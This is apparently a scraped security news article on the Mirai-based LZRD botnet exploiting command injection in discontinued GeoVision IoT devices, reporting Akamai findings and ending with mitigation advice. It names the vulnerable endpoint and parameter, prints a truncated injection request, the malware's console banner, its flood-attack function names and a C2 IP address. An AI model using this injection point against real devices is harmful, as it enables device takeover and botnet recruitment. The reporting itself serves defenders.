![Beats Studio Pro Wireless Headphones Now Just $169.95 - Save 51%! [Deal]](https://www.iclarified.com/images/news/97258/97258/97258-640.jpg)
![[The AI Show Episode 146]: Rise of “AI-First” Companies, AI Job Disruption, GPT-4o Update Gets Rolled Back, How Big Consulting Firms Use AI, and Meta AI App](https://www.marketingaiinstitute.com/hubfs/ep%20146%20cover.png)
Mirai Botnet Actively Exploiting GeoVision IoT Devices Command Injection Vulnerabilities
The cybersecurity landscape has once again been disrupted by the resurgence of the notorious Mirai botnet, which has been actively exploiting command injection vulnerabilities in discontinued GeoVision Internet of Things (IoT) devices. This latest campaign leverages two critical vulnerabilities-CVE-2024-6047 and CVE-2024-11120-that were initially disclosed in June and November 2024 respectively, but had remained unexploited until […] The post Mirai Botnet Actively Exploiting GeoVision IoT Devices Command Injection Vulnerabilities appeared first on Cyber Security News.
The cybersecurity landscape has once again been disrupted by the resurgence of the notorious Mirai botnet, which has been actively exploiting command injection vulnerabilities in discontinued GeoVision Internet of Things (IoT) devices.
This latest campaign leverages two critical vulnerabilities-CVE-2024-6047 and CVE-2024-11120-that were initially disclosed in June and November 2024 respectively, but had remained unexploited until recently.
The vulnerabilities allow unauthenticated remote attackers to inject and execute arbitrary system commands on targeted systems, providing a gateway for malware propagation.
Despite being known vulnerabilities for nearly a year, the technical details of these security flaws remained largely undisclosed until now, with information being sparse and no public records of active exploitation.
This lack of transparency may have contributed to the vulnerabilities remaining unpatched on numerous deployed devices, creating a fertile ground for attackers.
The exploit specifically targets the /DateSetting.cgi endpoint in GeoVision IoT devices, injecting malicious commands into the szSrvlpAddr parameter that fails to properly filter user input.
The scope of this threat is particularly concerning as it affects numerous discontinued GeoVision IoT devices that will not receive security updates or patches.
The situation exemplifies a persistent problem in the IoT industry where older, unsupported devices remain deployed in production environments, creating an expanding attack surface for threat actors.
Organizations utilizing these devices now face the difficult decision of either accepting the risk or decommissioning functional hardware due to security concerns.
Akamai researchers identified this malicious activity in early April 2025 through their global network of honeypots.
After thorough investigation, they attributed the attacks to a Mirai-based malware variant called LZRD, which has been observed targeting multiple vulnerabilities beyond just the GeoVision devices, including previously reported DigiEver vulnerabilities.
Infection Mechanism Analysis
The infection process begins when attackers send specifically crafted HTTP requests to vulnerable GeoVision devices targeting the /DateSetting.cgi endpoint.
The payload injects commands into the szSrvlpAddr parameter:-
/DateSetting.cgi dwTimeZone=2&dwGainType=0&szSrvIpAddr=time.Upon successful exploitation, the injected commands download and execute an ARM-based Mirai malware file named “boatnet,” which is a common nomenclature used in Mirai variants.
The LZRD variant can be distinguished by the unique string it prints to the target machine’s console upon execution:-
root@ubuntu2404-amd64-20250307-en-5:~# lzrd cock fest"/proc/"/eThe malware contains numerous attack functions consistent with other Mirai variants, including UDP and TCP flood capabilities.
Researchers identified several attack methods in the code:-
sym.attack_udp_plain
sym.attack_get_opt_ip
sym.attack_tcp_ack
sym.attack_method_nfo
sym.attack_method_raw
sym.attack_method_hexflood
sym.attack_method_tcp
sym.attack_method_udphex
sym.attack_udp_custom
sym.attack_tcp_stomp
sym.attack_method_tcpxmasFurther analysis revealed a hard-coded command and control (C2) IP address (198.23.212.246) embedded in the sym.resolve_cnc_addr() function, providing a direct line of communication between infected devices and the attackers’ infrastructure.
This C2 server displays a distinctive banner message similar to the previously reported InfectedSlurs/TBOTNET botnet, suggesting possible connections or code reuse between these malicious campaigns.
To protect against these threats, organizations should identify and replace vulnerable GeoVision devices, implement network segmentation to isolate IoT devices, and deploy intrusion detection systems to monitor for suspicious traffic patterns associated with the identified command and control infrastructure.
Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.
The post Mirai Botnet Actively Exploiting GeoVision IoT Devices Command Injection Vulnerabilities appeared first on Cyber Security News.
